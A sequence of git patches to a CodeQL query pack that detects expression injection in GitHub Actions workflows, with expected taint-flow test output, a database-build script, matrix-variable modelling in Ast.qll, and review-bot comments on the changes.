.ref }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | This node receives taint from $@. | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | this source | diff --git a/ql/src/test/test.expected b/ql/src/test/test.expected new file mode 100644 index 000000000000..5dd2313e8518 --- /dev/null +++ b/ql/src/test/test.expected 
@@ -0,0 +1,152 @@ +edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | +| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | +| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... 
g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | +| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... 
d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... 
utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... 
value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | +| composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | +| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | +| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | +nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | semmle.label | uses: . ... low.yml [workflow-output1] | +| .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output2] | semmle.label | uses: . ... low.yml [workflow-output2] | +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | semmle.label | ${{ git ... .ref }} | +| .github/workflows/calling_workflow.yml:16:5:19:2 | uses: o ... .yml@v1 [workflow-output] | semmle.label | uses: o ... .yml@v1 [workflow-output] | +| .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | semmle.label | ${{ git ... 
.ref }} | +| .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | semmle.label | uses: o ... .yml@v1 | +| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | semmle.label | echo ${ ... put1 }} | +| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | semmle.label | echo ${ ... put2 }} | +| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | +| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | semmle.label | echo ${ ... tput }} | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... 
_url }} | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | semmle.label | output workflow-output1: [workflow-output1] | +| .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output2] | semmle.label | output workflow-output1: [workflow-output2] | +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... 
utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | semmle.label | \| | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... 
value}} | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| composite-actions/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | +| composite-actions/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] | +| composite-actions/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | +| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | +| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | +subpaths +| .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:10:7:14:4 | output workflow-output1: [workflow-output1] | .github/workflows/calling_workflow.yml:12:5:15:2 | uses: . ... low.yml [workflow-output1] | +#select +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential injection from the ${{ steps.remove_quotations.outputs.replaced }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:35:14:35:61 | echo ${ ... put1 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output1 }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... 
put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/calling_workflow.yml:36:14:36:61 | echo ${ ... put2 }} | Potential injection from the ${{ needs.call2.outputs.workflow-output2 }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:18:20:18:60 | ${{ git ... .ref }} | .github/workflows/calling_workflow.yml:41:14:41:60 | echo ${ ... tput }} | Potential injection from the ${{ needs.call3.outputs.workflow-output }}, which may be controlled by an external user. | +| .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | .github/workflows/calling_workflow.yml:20:5:21:2 | uses: o ... .yml@v1 | .github/workflows/calling_workflow.yml:46:14:46:60 | echo ${ ... tput }} | Potential injection from the ${{ needs.call4.outputs.workflow-output }}, which may be controlled by an external user. | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential injection from the ${{ steps.changed-files.outputs.all_changed_files }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential injection from the ${{ env.ISSUE_BODY_PARSED }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.auto_branch }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... 
ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.destination_branch }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.pr_message }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ env.user_name }}, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential injection from the ${{ github.event.after }}, which may be controlled by an external user. | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential injection from the ${{ steps.trim-url.outputs.trimmed_url }}, which may be controlled by an external user. | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | +| .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | .github/workflows/calling_workflow.yml:14:20:14:60 | ${{ git ... .ref }} | .github/workflows/reusable_workflow.yml:28:14:30:62 | \| | Potential injection from the ${{ inputs.config-path }}, which may be controlled by an external user. 
| +| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential injection from the ${{ steps.summary.outputs.value }}, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential injection from the ${{ steps.step.outputs.value }}, which may be controlled by an external user. | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential injection from the ${{ needs.job1.outputs.job_output }}, which may be controlled by an external user. | +| composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:32:12:32:50 | echo ${ ... alue }} | Potential injection from the ${{ steps.replace.outputs.value }}, which may be controlled by an external user. | +| composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | composite-actions/action.yml:4:3:4:14 | input who-to-greet | composite-actions/action.yml:35:12:35:51 | echo "H ... et }}." | Potential injection from the ${{ inputs.who-to-greet }}, which may be controlled by an external user. | From 447b65e7a96b6dd4d3fe41c76d8d8f8d95564d1b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 12:37:41 +0100 Subject: [PATCH 077/707] Add script to build full DBs (testproj ones remove source code origin) --- build-test-dbs.sh | 5 +++++ 1 file changed, 5 insertions(+) create mode 100755 build-test-dbs.sh diff --git a/build-test-dbs.sh b/build-test-dbs.sh new file mode 100755 index 000000000000..d8fc4359b927 --- /dev/null +++ b/build-test-dbs.sh 
@@ -0,0 +1,5 @@ +#!/bin/bash +rm -rf src-test.testproj || true +rm -rf lib-test.testproj || true +codeql database create src-test.testproj -l yaml -s ql/src/test +codeql database create lib-test.testproj -l yaml -s ql/lib/test From 8a9ec88b36422ab7f40bedd3abb5a07492beee54 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 28 Feb 2024 13:21:29 +0100 Subject: [PATCH 078/707] feat(matrix): Add support for flow through matrix vars --- ql/lib/codeql/actions/Ast.qll | 78 +++++++++++++++++-- .../actions/controlflow/internal/Cfg.qll | 22 +++++- .../dataflow/internal/DataFlowPrivate.qll | 15 +++- ql/src/{test => Debug}/partial.ql | 2 +- ql/src/test/.github/workflows/matrix.yml | 42 ++++++++++ ql/src/test/partial.expected | 28 ------- ql/src/test/test.expected | 10 +++ 7 files changed, 159 insertions(+), 38 deletions(-) rename ql/src/{test => Debug}/partial.ql (92%) create mode 100644 ql/src/test/.github/workflows/matrix.yml delete mode 100644 ql/src/test/partial.expected diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 2a506f2100c1..c2b1cda8277b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -81,6 +81,8 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { } Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + + StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } } class ReusableWorkflowStmt extends WorkflowStmt { 
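Review bot: The script runs without `set -e`, so if the first `codeql database create` fails the second still runs and the script exits 0, and every path (`src-test.testproj`, `-s ql/src/test`) is relative to whatever directory the caller is in, so an invocation from outside the repo root deletes and builds against the wrong tree without any error. Suggest `set -euo pipefail` and `cd "$(dirname -- "$0")" || exit 1` directly after the shebang, and `rm -rf -- src-test.testproj` for the deletes. The `|| true` guards are dead as written: `rm -rf` already exits 0 when the path does not exist, so they only hide a genuine permission error.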
@@ -125,6 +127,23 @@ class OutputsStmt extends Statement instanceof YamlMapping { string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } } +class StrategyStmt extends Statement instanceof YamlMapping { + YamlMapping parent; + + StrategyStmt() { parent.lookup("strategy") = this } + + /** + * Gets a specific matric expression (YamlMapping) by name. + */ + MatrixVariableExpr getMatrixVariableExpr(string name) { + this.(YamlMapping).lookup("matrix").(YamlMapping).lookup(name) = result + } + + string getAMatrixVariableName() { + this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) + } +} + class InputExpr extends Expression instanceof YamlString { InputExpr() { exists(InputsStmt inputs | inputs.(YamlMapping).maps(this, _)) } } @@ -138,6 +157,14 @@ class OutputExpr extends Expression instanceof YamlString { } } +class MatrixVariableExpr extends Expression instanceof YamlString { + MatrixVariableExpr() { + exists(StrategyStmt outputs | + outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this + ) + } +} + /** * A Job is a collection of steps that run in an execution environment. */ @@ -191,6 +218,8 @@ class JobStmt extends Statement instanceof Actions::Job { IfStmt getIfStmt() { result = super.getIf() } Statement getPermissionsStmt() { result = this.(YamlMapping).lookup("permissions") } + + StrategyStmt getStrategyStmt() { result = this.(YamlMapping).lookup("strategy") } } /** @@ -332,7 +361,8 @@ class ExprAccessExpr extends Expression instanceof YamlString { class CtxAccessExpr extends ExprAccessExpr { CtxAccessExpr() { expr.regexpMatch([ - stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex() + stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), + matrixCtxRegex() ]) } 
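Review bot: `StrategyStmt.getAMatrixVariableName()` enumerates the keys of the strategy mapping itself (`this.(YamlMapping).maps(...)`), so on the `matrix.yml` fixture in this patch it yields `fail-fast` and `matrix`, not the axis names that `getMatrixVariableExpr(name)` resolves one level down; it should descend first: `this.(YamlMapping).lookup("matrix").(YamlMapping).maps(any(YamlString s | s.getValue() = result), _)`. Nothing in this hunk calls it yet, so the mismatch is latent, but a caller pairing the two predicates will get an empty result. Two smaller points in the same hunk: the `exists` variable in `MatrixVariableExpr` is named `outputs` although it binds a `StrategyStmt`, and the doc comment reads "matric expression". Because `MatrixVariableExpr` is `instanceof YamlString`, an axis written as a YAML sequence or supplied through `include:` is presumably not modelled at all — if that is intended, a one-line comment on the class saying so would help the next reader.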
@@ -342,22 +372,28 @@ class CtxAccessExpr extends ExprAccessExpr { } private string stepsCtxRegex() { - result = "\\bsteps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string needsCtxRegex() { - result = "\\bneeds\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } private string jobsCtxRegex() { - result = "\\bjobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") } -private string envCtxRegex() { result = "\\benv\\.([A-Za-z0-9_-]+)\\b" } +private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } + +private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } private string inputsCtxRegex() { - result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" or - result = "\\bgithub\\.event\\.inputs\\.([A-Za-z0-9_-]+)\\b" + result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) +} + +bindingset[regex] +private string wrapRegexp(string regex) { + result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] } /** 
